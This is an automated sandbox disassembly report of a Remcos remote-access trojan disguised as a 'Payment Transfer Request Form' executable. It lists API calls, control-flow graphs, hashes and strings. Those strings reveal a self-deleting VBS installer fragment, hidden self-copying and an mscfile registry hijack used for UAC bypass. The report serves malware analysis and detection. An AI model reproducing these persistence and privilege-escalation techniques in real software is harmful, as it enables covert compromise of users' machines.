                                              Function 0041A8DA Relevance: 105.1, APIs: 36, Strings: 24, Instructions: 130libraryloaderCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                              • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                              • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                              • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                              • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                              • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                              • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                              • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                              • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
                                              • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041AA22
                                              • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041AA33
                                              • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
                                              • GetProcAddress.KERNEL32(00000000), ref: 0041AA43
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$HandleModule$LibraryLoad
                                              • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
                                              • API String ID: 551388010-2474455403
                                              • Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                              • Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
                                              • Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                                              • Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E
                                              Function 0040D3F0 Relevance: 70.8, APIs: 16, Strings: 24, Instructions: 774COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 7 40d3f0-40d45f call 41a8da call 40dd83 call 4020d6 * 2 call 419d87 call 40e563 call 401e6d call 43a300 24 40d461-40d4b5 call 40e609 call 401e45 call 401f8b call 40f98d call 40e5ba call 40dd70 call 401fb8 7->24 25 40d4b8-40d57f call 401e45 call 401f8b call 401e45 call 4052fe call 408209 call 401fc2 call 401fb8 * 2 call 401e45 call 401fa0 call 405a86 call 401e45 call 4051c3 call 401e45 call 4051c3 7->25 70 40d581-40d5c9 call 40822a call 401fc2 call 401fb8 call 401f8b call 411f34 25->70 71 40d5cf-40d5ea call 401e45 call 40fbab 25->71 70->71 105 40dd0f-40dd27 call 401f8b call 41239a call 410eda 70->105 80 40d656-40d679 call 401f8b CreateMutexA GetLastError 71->80 81 40d5ec-40d60d call 401e45 call 401f8b OpenMutexA 71->81 90 40d991-40d99a call 401fb8 80->90 91 40d67f-40d686 80->91 98 40d622-40d63f call 401f8b call 411f34 81->98 99 40d60f-40d61c WaitForSingleObject CloseHandle 81->99 110 40d9a1-40da01 call 434c30 call 40245c call 401f8b * 2 call 4120e8 call 408093 90->110 94 40d688 91->94 95 40d68a-40d6a7 GetModuleFileNameW call 4192ae 91->95 94->95 108 40d6b0-40d6b4 95->108 109 40d6a9-40d6ab 95->109 126 40d651 98->126 127 40d641-40d650 call 401f8b call 41239a 98->127 99->98 136 40dd2c 105->136 111 40d6b6-40d6c9 call 401e45 call 401f8b 108->111 112 40d717-40d72a call 401e45 call 401f8b 108->112 109->108 177 40da06-40da5f call 401e45 call 401f8b call 402073 call 401f8b call 41215f call 401e45 call 401f8b call 439867 110->177 111->112 140 40d6cb-40d6d1 111->140 142 40d731-40d7ad call 401e45 call 401f8b call 408093 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b 112->142 143 40d72c call 40e501 112->143 126->80 127->126 141 40dd31-40dd65 call 402073 call 4052dd call 402073 call 4194da call 401fb8 136->141 140->112 146 40d6d3-40d6d9 140->146 187 40dd6a-40dd6f call 413980 141->187 216 40d815-40d819 142->216 217 40d7af-40d7c8 call 401e45 call 401f8b call 439891 142->217 143->142 151 40d6f7-40d710 call 401f8b call 411eea 146->151 152 40d6db-40d6ee call 4060ea 146->152 151->112 175 40d712 call 4066a6 151->175 152->112 168 40d6f0-40d6f5 call 4067a0 152->168 168->112 175->112 221 40da61-40da63 177->221 222 40da65-40da67 177->222 216->110 220 40d81f-40d826 216->220 217->216 250 40d7ca-40d7f6 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5ed 217->250 224 40d8a7-40d8b1 call 408093 220->224 225 40d828-40d89a call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 40b871 220->225 226 40da6b-40da7c call 41aa4f CreateThread 221->226 227 40da69 222->227 228 40da7e-40db48 call 402073 * 2 call 4194da call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 401e45 call 401f8b call 401e45 call 401f8b call 408f1f call 401e45 call 401f8b 222->228 235 40d8b6-40d8de call 40245c call 43254d 224->235 316 40d89f-40d8a5 225->316 226->228 227->226 349 40db83-40db9a call 401e45 call 401f8b 228->349 350 40db4a-40db81 call 43229f call 401e45 call 401f8b CreateThread 228->350 256 40d8f0 235->256 257 40d8e0-40d8ee call 434c30 235->257 292 40d7fb-40d810 call 401ef3 call 401ee9 250->292 263 40d8f2-40d967 call 401ee4 call 43a796 call 40245c call 401f8b call 40245c call 401f8b call 412338 call 432556 call 401e45 call 40fbab 256->263 257->263 263->177 331 40d96d-40d98c call 401e45 call 419bca call 40de34 263->331 292->216 316->235 331->177 346 40d98e-40d990 331->346 346->90 359 40dbd9-40dbeb call 401e45 call 401f8b 349->359 360 40db9c-40dbd4 call 43229f call 401e45 call 401f8b CreateThread 349->360 350->349 371 40dc4c-40dc5e call 401e45 call 401f8b 359->371 372 40dbed-40dc47 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5a1 call 401ef3 call 401ee9 CreateThread 359->372 360->359 383 40dc60-40dc94 call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 40b0a3 371->383 384 40dc99-40dcbf call 4195f8 call 401ef3 call 401ee9 371->384 372->371 383->384 404 40dcc1 384->404 405 40dcc4-40dcd7 CreateThread 384->405 404->405 408 40dce5-40dcec 405->408 409 40dcd9-40dce3 CreateThread 405->409 412 40dcfa-40dd01 408->412 413 40dcee-40dcf8 CreateThread 408->413 409->408 412->136 416 40dd03-40dd06 412->416 413->412 416->187 418 40dd08-40dd0d 416->418 418->141
                                              APIs
                                                • Part of subcall function 0041A8DA: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                                                • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
                                                • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
                                                • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
                                                • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
                                                • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                                                • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
                                                • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                                                • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                                                • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                                                • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                                                • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                                                • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                                                • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                                                • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603
                                                • Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
                                              • String ID: (#G$0"G$0"G$0"G$Access Level: $Administrator$C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe$Exe$H"G$H"G$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$licence$license_code.txt$origmsc$!G$!G$!G$!G$!G
                                              • API String ID: 1529173511-3528402863
                                              • Opcode ID: d89d02469d97cc3db5e55cc2180265972a21f8892f96be6ab96ac0e3e31d4c3c
                                              • Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
                                              • Opcode Fuzzy Hash: d89d02469d97cc3db5e55cc2180265972a21f8892f96be6ab96ac0e3e31d4c3c
                                              • Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E
                                              Function 0040B871 Relevance: 40.5, APIs: 10, Strings: 13, Instructions: 296fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 420 40b871-40b88f call 439891 423 40b891-40b8b4 call 401ee4 CreateDirectoryW call 4081c7 420->423 424 40b8e2-40b905 call 40c5ed call 401ef3 420->424 432 40b8b9-40b8e0 call 402ff4 call 401ef3 call 401ee9 423->432 433 40b909-40b925 call 401ee9 call 401ee4 call 439f5d 424->433 432->433 446 40b941-40b956 call 401ee4 CopyFileW 433->446 447 40b927-40b93c call 401ee4 call 40b77f 433->447 452 40b9f5-40ba10 call 401ee4 call 40b77f 446->452 453 40b95c-40b961 446->453 458 40bc4e-40bc58 447->458 466 40ba12-40ba2d call 401ee4 SetFileAttributesW call 439891 452->466 467 40ba3e-40ba96 call 439e5f call 40415e call 402ff4 call 401ee9 call 40415e call 40808e 452->467 453->452 457 40b967-40b977 call 439891 453->457 464 40b9b9-40b9c2 call 40c5ed call 401ef3 457->464 465 40b979-40b9b7 call 40c5ed call 402ff4 * 2 call 401ef3 call 401ee9 * 2 457->465 480 40b9c7-40b9e4 call 401ee9 call 401ee4 CopyFileW 464->480 465->480 466->467 487 40ba2f-40ba3c call 401ee4 SetFileAttributesW 466->487 510 40bb46-40bc10 call 40415e * 2 call 4042fd call 402f85 call 402ff4 call 40323d call 401ee9 * 5 call 40808e call 401ee4 call 40245c call 401ee4 call 41a17b 467->510 511 40ba9c-40bb41 call 40415e * 2 call 402ff4 call 402f85 call 402ff4 * 2 call 40323d call 401ee9 * 6 467->511 480->452 500 40b9e6-40b9f0 call 408093 480->500 487->467 500->458 569 40bc12-40bc33 call 401ee4 ShellExecuteW 510->569 570 40bc3c-40bc49 call 401ee9 * 2 510->570 511->510 569->570 575 40bc35-40bc36 ExitProcess 569->575 570->458
                                              APIs
                                              • _wcslen.LIBCMT ref: 0040B882
                                              • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B89B
                                              • CopyFileW.KERNELBASE(C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe,00000000,00000000,00000000,00000000,00000000,?,00471FFC), ref: 0040B952
                                              • _wcslen.LIBCMT ref: 0040B968
                                              • CopyFileW.KERNEL32(C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe,00000000,00000000,00000000), ref: 0040B9E0
                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA22
                                              • _wcslen.LIBCMT ref: 0040BA25
                                              • SetFileAttributesW.KERNEL32(00000000,00000007), ref: 0040BA3C
                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00469654,00469654,00000000), ref: 0040BC2A
                                              • ExitProcess.KERNEL32 ref: 0040BC36
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$_wcslen$AttributesCopy$CreateDirectoryExecuteExitProcessShell
                                              • String ID: """, 0$6$C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe$CreateObject("WScript.Shell").Run "cmd /c ""$Set fso = CreateObject("Scripting.FileSystemObject")$Temp$WScript.Sleep 1000$\install.vbs$fso.DeleteFile $fso.DeleteFile(Wscript.ScriptFullName)$open$!G$!G
                                              • API String ID: 2743683619-975760962
                                              • Opcode ID: 7e4727aa8f49046eefbfda1a042f71d8cc3efee68372e0efb99ac5bec21b015c
                                              • Instruction ID: 1f37921bc36cc04280d9be7a1af933bc03f5727a4608831148a2c1203a4a5f71
                                              • Opcode Fuzzy Hash: 7e4727aa8f49046eefbfda1a042f71d8cc3efee68372e0efb99ac5bec21b015c
                                              • Instruction Fuzzy Hash: CA9161712083415BC218F766DC92EAF77D8AF90708F50043FF546A61E2EE7C9A49C69E
                                              Function 0040C5ED Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 139COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetLongPathNameW.KERNELBASE(00000000,?,00000208), ref: 0040C753
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: LongNamePath
                                              • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                              • API String ID: 82841172-425784914
                                              • Opcode ID: 165ae159e7404ea7ab366716f35d3f4fd542e18db0df633051c5d02fd84c7766
                                              • Instruction ID: e0747f7f0ded3e76473395fd4b63a7f1dfd4675be44f898a7a0c8db3d1efc66a
                                              • Opcode Fuzzy Hash: 165ae159e7404ea7ab366716f35d3f4fd542e18db0df633051c5d02fd84c7766
                                              • Instruction Fuzzy Hash: EB4168315042419AC204FB62DC929EFB7E8AEA4759F10063FF541720E2EF799E49C99F
                                              Function 004192AE Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,0040C663,WinDir,00000000,00000000), ref: 00419F34
                                                • Part of subcall function 00411F91: RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                                • Part of subcall function 00411F91: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                                • Part of subcall function 00411F91: RegCloseKey.KERNELBASE(?), ref: 00411FDD
                                              • StrToIntA.SHLWAPI(00000000,00469710,00000000,00000000,00000000,00471FFC,00000001,?,?,?,?,?,?,0040D6A0), ref: 00419327
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCurrentOpenProcessQueryValue
                                              • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                              • API String ID: 1866151309-2070987746
                                              • Opcode ID: 4218ec346c6394332b380c1f17dfa7b34b15a30bb6585ed312dac3d8bcd9d2cb
                                              • Instruction ID: a9b62d1d1389f8d2b696bc63f2982e792167bed2dd8bed00043a633dd184e9c5
                                              • Opcode Fuzzy Hash: 4218ec346c6394332b380c1f17dfa7b34b15a30bb6585ed312dac3d8bcd9d2cb
                                              • Instruction Fuzzy Hash: E411E371A002456AC704B765CC67AAF761D8B54309F64053FF905A71E2FABC4D8282AA
                                              Function 0041A17B Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 686 41a17b-41a18c 687 41a1a4-41a1ab 686->687 688 41a18e-41a191 686->688 691 41a1ac-41a1c5 CreateFileW 687->691 689 41a193-41a198 688->689 690 41a19a-41a1a2 688->690 689->691 690->691 692 41a1c7-41a1c9 691->692 693 41a1cb-41a1d0 691->693 694 41a209-41a20e 692->694 695 41a1d2-41a1e0 SetFilePointer 693->695 696 41a1eb-41a1fc WriteFile 693->696 695->696 699 41a1e2-41a1e9 CloseHandle 695->699 697 41a200-41a207 CloseHandle 696->697 698 41a1fe 696->698 697->694 698->697 699->692
                                              APIs
                                              • CreateFileW.KERNELBASE(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041A29A,00000000,00000000,00000000), ref: 0041A1BA
                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1D7
                                              • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1E3
                                              • WriteFile.KERNELBASE(00000000,00000000,00000000,0040649B,00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A1F4
                                              • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041A29A,00000000,00000000), ref: 0041A201
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: File$CloseHandle$CreatePointerWrite
                                              • String ID:
                                              • API String ID: 1852769593-0
                                              • Opcode ID: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                                              • Instruction ID: 9d85e8900f1be3931a26f88ae5ac80d5e45035a8363d546858a313564ae31bc3
                                              • Opcode Fuzzy Hash: 900e91da6aef5ae1ef2d64e2906a14ebfc53969b27a9c650ee74425d8e4f4bd5
                                              • Instruction Fuzzy Hash: 0911C4712062147FE6105A249C88EFB779CEB46375F10076AF556C32D1C6698C95863B
                                              Function 00412204 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 700 412204-412217 RegCreateKeyW 701 412257 700->701 702 412219-412255 call 40245c call 401ee4 RegSetValueExW RegCloseKey 700->702 704 412259-412267 call 401ee9 701->704 702->704
                                              APIs
                                              • RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,?), ref: 0041220F
                                              • RegSetValueExW.KERNELBASE(?,00469654,00000000,00000000,00000000,00000000,00469654,?,80000001,?,0040674F,00469654,C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe), ref: 0041223E
                                              • RegCloseKey.KERNELBASE(?,?,80000001,?,0040674F,00469654,C:\Users\user\Desktop\Payment Transfer Request Form.bat.exe), ref: 00412249
                                              Strings
                                              • Software\Classes\mscfile\shell\open\command, xrefs: 0041220D
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseCreateValue
                                              • String ID: Software\Classes\mscfile\shell\open\command
                                              • API String ID: 1818849710-505396733
                                              • Opcode ID: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
                                              • Instruction ID: 05e6d75f170e8ecdfe9b8062019ada1801530107581382ed9d20477649f1572c
                                              • Opcode Fuzzy Hash: 3e3fd8a80b9e4d87c81bb3c401438d747e56ec0492b29cf55bc65580399ff691
                                              • Instruction Fuzzy Hash: A1F0AF71440218BBCF00DFA1ED45AEE376CEF44755F00816ABC05A61A1E63A9E14DA94
                                              Function 00411F91 Relevance: 4.5, APIs: 3, Instructions: 44registryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 710 411f91-411fbd RegOpenKeyExA 711 411ff2 710->711 712 411fbf-411fe7 RegQueryValueExA RegCloseKey 710->712 713 411ff4 711->713 712->713 714 411fe9-411ff0 712->714 715 411ff9-412005 call 402073 713->715 714->715
                                              APIs
                                              • RegOpenKeyExA.KERNELBASE(80000002,00000400,00000000,00020019,?), ref: 00411FB5
                                              • RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,?,00000400), ref: 00411FD2
                                              • RegCloseKey.KERNELBASE(?), ref: 00411FDD
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseOpenQueryValue
                                              • String ID:
                                              • API String ID: 3677997916-0
                                              • Opcode ID: 46f44901f2d2fc7136e1423d50997732e2853f2e089d8a6a99562a992c0dbb79
                                              • Instruction ID: 7c5a36a74d232ee299d7294234303f181ef10811f7d8c913f13e4634b011a18e
                                              • Opcode Fuzzy Hash: 46f44901f2d2fc7136e1423d50997732e2853f2e089d8a6a99562a992c0dbb79
                                              • Instruction Fuzzy Hash: 2D01D676900218BBCB209B95DD08DEF7F7DDB84751F000166BB05A3150DB748E46D7B8
                                              Function 0040163E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 746 40163e-401644 747 401646-401648 746->747 748 401649-401654 746->748 749 401656 748->749 750 40165b-401665 748->750 749->750 751 401667-40166d 750->751 752 401688-401689 call 43229f 750->752 751->752 754 40166f-401674 751->754 755 40168e-40168f 752->755 754->749 756 401676-401686 call 43229f 754->756 757 401691-401693 755->757 756->757
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                              • Instruction ID: 17b6f17919427e724365abd55f1db4a6b8769e1fa76fb76fe63095c9ff18be87
                                              • Opcode Fuzzy Hash: f210c679e2b780eded3ea4ef50917041f60fa4d2abe52b8749c2b449606446f0
                                              • Instruction Fuzzy Hash: 09F0ECB02042015BCB1C9B34CD5062B379A4BA8365F289F7FF02BD61E0C73AC895860D
                                              Function 00443649 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 760 443649-443655 761 443687-443692 call 43ad91 760->761 762 443657-443659 760->762 770 443694-443696 761->770 763 443672-443683 RtlAllocateHeap 762->763 764 44365b-44365c 762->764 766 443685 763->766 767 44365e-443665 call 442a57 763->767 764->763 766->770 767->761 772 443667-443670 call 440480 767->772 772->761 772->763
                                              APIs
                                              • RtlAllocateHeap.NTDLL(00000000,00433069,?,?,004365E7,?,?,00000000,00473A38,?,0040C88A,00433069,?,?,?,?), ref: 0044367B
                                              Memory Dump Source
                                              • Source File: 00000009.00000002.1405698672.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_9_2_400000_Payment Transfer Request Form.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
